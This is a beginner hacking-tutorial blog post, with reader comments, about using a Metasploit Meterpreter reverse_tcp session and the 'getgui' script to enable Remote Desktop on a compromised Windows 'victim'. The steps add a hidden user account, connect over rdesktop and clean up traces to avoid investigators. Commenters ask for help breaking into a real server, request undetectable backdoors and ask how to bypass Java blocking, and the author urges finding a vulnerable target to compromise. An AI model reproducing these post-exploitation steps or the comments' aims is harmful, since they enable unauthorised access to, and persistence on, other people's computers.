5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter


Type : Tutorial

Level : Beginner, Medium

Last year when I'm teaching about computer security class, one student come and ask "can you give me simple tutorial how to use command prompt?", then I say "I don't think so it will be do in a short course because learning about command prompt you should practice everyday for first times and make it familiar like your mother tongue" from this situation I know that not every people know about command prompt or something related to console based. How about hacking?yep it's the same…sometimes newly learned they just follow tutorials, but didn't know what exactly they doing.

Today I will write simple tutorial how to enable Remote Desktop(use Remote Desktop Protocol on TCP port 3389) when you've already inside remote system using Metasploit Framework. This method should be useful if you have limitation how to use command prompt. In this case, we will utilize Carlos Perez's 'getgui' script, which enables Remote Desktop and creates a user account for you to log into it with.

Requirement :

1. Metasploit Framework

2. Backtrack 5(or another linux OS)

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter :

1. My favourite meterpreter is using reverse_tcp. If you also like to use reverse_tcp for your payload, you can use like the command below.

set payload windows/meterpreter/reverse_tcp

2. Inside the meterpreter, execute

meterpreter > run getgui -h

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

to view the help.

3. To add a user with username : valent and password : r4h45i4 and then enable the Remote Desktop Service

run getgui -u valent -p r4h45i4

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

Yep we already successfully created the user and activated the Remote Desktop Service.

Please note the last command "For cleanup use command : run multi_console_command….bla…bla….bla" it will be used after finish using the Remote Desktop Service of victim computer.

4. To connect to victim using remote desktop, we can use rdesktop program (it's already installed on backtrack).

rdesktop -u <username>  -p <password> <ip-address-target>

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

initializing……and then….

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter

5. You also should remember that when you add user it's mean that you are adding one new user on remote computer. Be wise to use this methods, because when you do much changes, you also will left a lot of changes on remote computer and it can be tracked by investigators ๐Ÿ™‚ . To clean up the user we've already created before(you can see on step 3).

5 Steps to Enable Remote Desktop Using Metasploit Meterpreter


hope it's useful for you…any question?just drop on comment box. ๐Ÿ™‚

(Visited 16,294 times, 1 visits today)

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web.
Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • Hagai

    I have a bigginers Q. ๐Ÿ™‚
    where do I find the Meterpreter in BT5?

  • puppet

    how do we know the username n password of the victim???
    n do we need to add new user to the victim compter?

    • v4L

      First of all, you should find a vulnerable target…and then try to compromise it…when you successfully compromise target, you didn’t need to input any password or username ๐Ÿ™‚

  • mehdi

    i have a probleme Unknown command: rdesktop

    • v4L

      Hmm….maybe you didn’t have rdesktop installed…try to run apt-get install rdesktop.

  • Pingback: Hacking Windows 7 SP 1 Using Java Signed Applet Social Engineering Code Execution | Vishnu Valentino Hacking Tutorial, Tips and Trick()

  • th3bAdh

    i have problem with rdesktop, password was invalid, but i've double check password, but still gettin error

    • v4L

      hmm…if the password was correct it should have no error like this…maybe the password was empty or issue with keyboard localization..

  • vir0e5

    Thx for info….
    Download RDesktop

  • josh

    I am using following payload:
    but wen i run the exploit..
    after the binding, it says "Sending exploit …"
    and then it returns me ….msf  exploit(ms03_026_dcom) > 
    so nothing happens…..you know what could be the possible reason for this?

    • v4L

      maybe it’s mean that the target isn’t vulnerable.

  • bagus

    when i write getgui – h run , run the command it says unokwon ..
    What should I do ?

    • v4L

      did you already inside meterpreter console?

  • DeusIgni

    Whenever I attempt to create a shell in target computer, the handler is created on my end, but the connection times out. Why is that? Is it error on my end?

    • v4L

      Hmm maybe the target prevent you to create it…doesn’t mean that if you got meterpreater,you’ll also got the shell…it’s depend with the vulnerability ranking…fyi the target machine in this tutorial was XP SP0..

  • DeusIgni

    Is there a way to use this exploit on XP SP3?

  • boby

    i am using bt5 r2 in vmware.i am trying to remotely  control my win 7 desktop.when meterpreter session -i 1 is started like
    when i enter the shell,pwd or cd command it give me error of unknoun command
    what will i do??

    • v4L

      maybe the rating of exploit you use not an excellent one. btw if you want to try and make sure it work you can view this tutorial http://www./hacking-tutorial/create-simple-exploit-using-metasploit-to-hack-windows-7/

  • boby

    I m using windows/meterpreter/reverse_tcp,i have same problem.I have tried java_signed_applet i still have this problem " unknown command ".when i was using backtrack 5 r1 it was working very well
    Is there any installation problem or may have some bugs in backtrack 5 r2???

  • boby

    pwd unknoun command
    same problem

    • v4L

      Hmmm….maybe you can try to update your metasploit framework first by using msfupdate command.

      • boby

        Thank you very mush for your reply… ๐Ÿ™‚

        which tool of backtrack 5 must be update after installation??and which command i have to use???

        i am using these commands
        for msf
        for library
        2,apt-get install mingw32-runtime mingw-w64 mingw gcc-mingw32 mingw32-binutils

        which command you have suggested me to update backtrack 5 R1 or Backtrack 5 R2 for better performance?

        • v4L

          btw I didn’t know the exact thing from your problem and how you install your BT. maybe you also can try to update your system using apt-get update and apt-get upgrade.

  • boby

    my problem is solve.Thanks for your help

  • deff

    what is stupidity, provide a metasploit payload when you just need to add user to a group and start a service from shell. I understand the reason you provide it but would be a lot more usefull to actually explain it than just provide script kiddies…

    • v4L

      LoL…maybe what you mean is http://www./tips-and-trick/how-to-enable-remote-desktop-using-command-prompt/
      if you think like that, so why you didn’t contribute to wrote an “awesome tutorial” here? or maybe you give your own tutorial link…don’t just say and criticize without action ๐Ÿ˜› it’s just wasting your time… ๐Ÿ™‚
      ps : next time it’s better use your real e-mail not the fake one ๐Ÿ™‚
      merci monsieur

  • Puka

    I have metasploit 4.4 gui comunity edition but no change to exploit. btw i have windows 7 sp1

    • v4L

      I don’t understand?

  • anonymous

    i hv installed backtrack on vmware and hack my windows 7 system with the system intenal ip but how i can set my dynamic ip to hack computer remotely

    • v4L

      read more here : http://www./hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/

  • Samuel

    Hi, when i tried to do the rdesktop -u ( ) -p ( ) and the ipaddress and pressed enter it says Autoselected keyboard map en-us and does not do anything…do you know why that happens?

    • v4L

      hmm…maybe your remote desktop service on victim PC haven’t started yet..
      maybe you can take a look to this tutorial : http://www./tips-and-trick/how-to-enable-remote-desktop-using-command-prompt/

  • Thirteen

    Thanks for your time and effort to provide tutorials!

  • boby


    please giive me a toturial to hack pc on other network.please guide me

    • v4L


  • Remaro

    Like other people, I am also getting the “unknown command” error once the meterpreter prompt is up, and no commands will work. You can see it here: http://imgur.com/WK2KQ What causes this?

  • after executing this command :
    run getgui -u testuser -p testpass

    show me this message :
    This version of Meterpreter is not supported with this Script!

    what’s the problem?

    • v4L

      maybe you can try to update the metasploit library msfupdate.

  • boby


    I want download vanish.sh and crypter.ph for backtrack 5 r3,I search it on google but I cannot find it.kindly give me these undectable backdoors or download link.I will be very thankful to you

    • v4L

      I think you just haven’t search it ๐Ÿ™‚

      • boby

        No its not ๐Ÿ˜€ I search on net,I found the code but it didn’t work ๐Ÿ™‚
        Thanks for you corporation ๐Ÿ™‚

  • fahmi

    after I type set payload windows/meterpreter/reverse_tcp the meterpreter won’t to show up, why? thanks

    • v4L


      you need to exploit 1st and can get the meterpreter console. See other hacking tutorials here http://www./category/hacking-tutorial/

  • intoxicate

    Hey, I’ve tried to use getgui through meterpreter but apparently it doesn’t add user to the remote machine. To prove this, I get on my remote host and run net command to see if any user has been added to administrator local group. But none of user has been added to that group. Since it doesn’t add a user to remote host, I cannot login via rdesktop. I’m not sure if the script is not working properly or I did something wrong.

    • v4L


      on victim computer, you need to have system privileges

  • sheaz


    v4L i want to hack a server its ip is 203.128.26.xxx and remote desktop is already on. i am new in this field. please only make user in this server and please give me user name and password i am very thankful to you.

  • akbar

    I am a student from Iran ..
    thanks for your this tutorial ….!

  • GuestMan

    It is work when victim has linux?

    • v4L

      no it cannot

  • Guest1

    rdesktop is not pre-installed in BT 5 or Kali Linux

  • tom

    java blocks the applet completely, is there any way to get around this an updated method of doing the same or a similar thing